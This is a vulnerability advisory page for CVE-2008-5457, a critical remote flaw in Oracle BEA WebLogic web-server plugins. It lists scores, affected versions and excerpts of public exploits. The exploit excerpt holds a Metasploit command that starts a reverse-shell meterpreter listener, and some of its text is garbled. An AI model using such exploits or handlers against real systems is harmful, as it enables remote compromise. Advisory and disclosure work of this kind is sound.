CVE-2008-5457

Published: 14/01/2009 Updated: 23/10/2012
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

Unspecified vulnerability in the Oracle BEA WebLogic Server Plugins for Apache, Sun and IIS web servers component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, and 7.0 SP7 allows remote malicious users to affect confidentiality, integrity, and availability via unknown vectors.

Vulnerable Product

oracle bea product suite 10.3

oracle bea product suite 10.0

oracle bea product suite 9.2

oracle bea product suite 8.1

oracle bea product suite 7.0

oracle bea product suite 9.1

oracle bea product suite 9.0

Exploits

Oracle Weblogic IIS connector remote overflow exploit that relates to JSESSIONID ...
#!/usr/bin/perl
# No point in keeping this private anymore!
#
# k`sOSe - 02/16/2009 - CVE-2008-5457
# Tested on w2k sp4 and w2k3 R2 sp2 (no NX)
#
# cohelet framework-32 # /msfcli multi/handler PAYLOAD=windows/reflectivemeterpreter/reverse_tcp LHOST=1010101 LPORT=80 E
# [*] Please wait while we load the module tree
# [*] Handler binding to L ...
##
# $Id: bea_weblogic_jsessionid.rb 9670 2010-07-03 03:19:07Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# metasploit.com/framework/
##

require 'msf/core' ...